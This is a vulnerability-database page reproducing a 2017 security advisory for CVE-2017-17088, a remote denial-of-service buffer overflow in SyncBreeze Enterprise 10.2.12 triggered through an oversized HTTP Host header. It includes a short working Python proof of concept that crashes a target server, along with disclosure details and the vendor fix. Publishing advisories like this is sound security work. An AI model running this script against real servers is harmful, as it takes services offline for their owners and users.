Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormManuel Garcia CardenasPACKETSTORM:145435
HistoryDec 15, 2017 - 12:00 a.m.

Sync Breeze 10.2.12 Denial Of Service

2017-12-1500:00:00
Manuel Garcia Cardenas
packetstormsecurity.com
34

0.019 Low

EPSS

Percentile

88.6%

JSON
`=============================================  
MGC ALERT 2017-007  
- Original release date: November 30, 2017  
- Last revised: December 14, 2017  
- Discovered by: Manuel GarcAa CA!rdenas  
- Severity: 7,5/10 (CVSS Base Score)  
- CVE-ID: CVE-2017-17088  
=============================================  
  
I. VULNERABILITY  
-------------------------  
SyncBreeze <= 10.2.12 - Denial of Service  
  
II. BACKGROUND  
-------------------------  
SyncBreeze is a fast, powerful and reliable file synchronization solution  
for local disks, network shares, NAS storage devices and enterprise storage  
systems.  
  
III. DESCRIPTION  
-------------------------  
The Enterprise version of SyncBreeze is affected by a Remote Denial of  
Service vulnerability.  
  
The web server does not check bounds when reading server request in the  
Host header on making a connection, resulting in a classic Buffer Overflow  
that causes a Denial of Service.  
  
To exploit the vulnerability only is needed use the version 1.1 of the HTTP  
protocol to interact with the application.  
  
IV. PROOF OF CONCEPT  
-------------------------  
#!/usr/bin/python  
import sys, socket  
  
host = sys.argv[1]  
buffer="GET / HTTP/1.1\r\n"  
buffer+="Host: "+"A"*2000+"\r\n\r\n"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, 80))  
s.send(buffer)  
s.close()  
  
V. BUSINESS IMPACT  
-------------------------  
Availability compromise can result from these attacks.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
SyncBreeze <= 10.2.12  
  
VII. SOLUTION  
-------------------------  
Vendor release 10.3 version  
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe  
  
VIII. REFERENCES  
-------------------------  
http://www.syncbreeze.com/  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
November 30, 2017 1: Initial release  
December 14, 2017 2: Revision to send to lists  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas  
November 30, 2017 2: Send to vendor  
December 6, 2017 3: Vendor fix the vulnerability and release a new version  
December 14, 2017 4: Send to the Full-Disclosure lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Manuel Garcia Cardenas  
Pentester  
  
`

Related

zdt 1
exploitpack 1
nvd 1
cve 1
prion 1
cvelist 1
exploitdb 1
zdt
zdt
Sync Breeze 10.2.12 - Denial of Service Exploit
2017-12-15 00:00:00
exploitpack
exploitpack
Sync Breeze 10.2.12 - Denial of Service
2017-12-15 00:00:00
nvd
nvd
CVE-2017-17088
2017-12-19 15:29:00
cve
cve
CVE-2017-17088
2017-12-19 15:29:00
prion
prion
Buffer overflow
2017-12-19 15:29:00
cvelist
cvelist
CVE-2017-17088
2017-12-19 15:00:00
exploitdb
exploitdb
Sync Breeze 10.2.12 - Denial of Service
2017-12-15 00:00:00

0.019 Low

EPSS

Percentile

88.6%

JSON
Related for PACKETSTORM:145435
zdt1exploitpack1nvd1cve1prion1cvelist1exploitdb1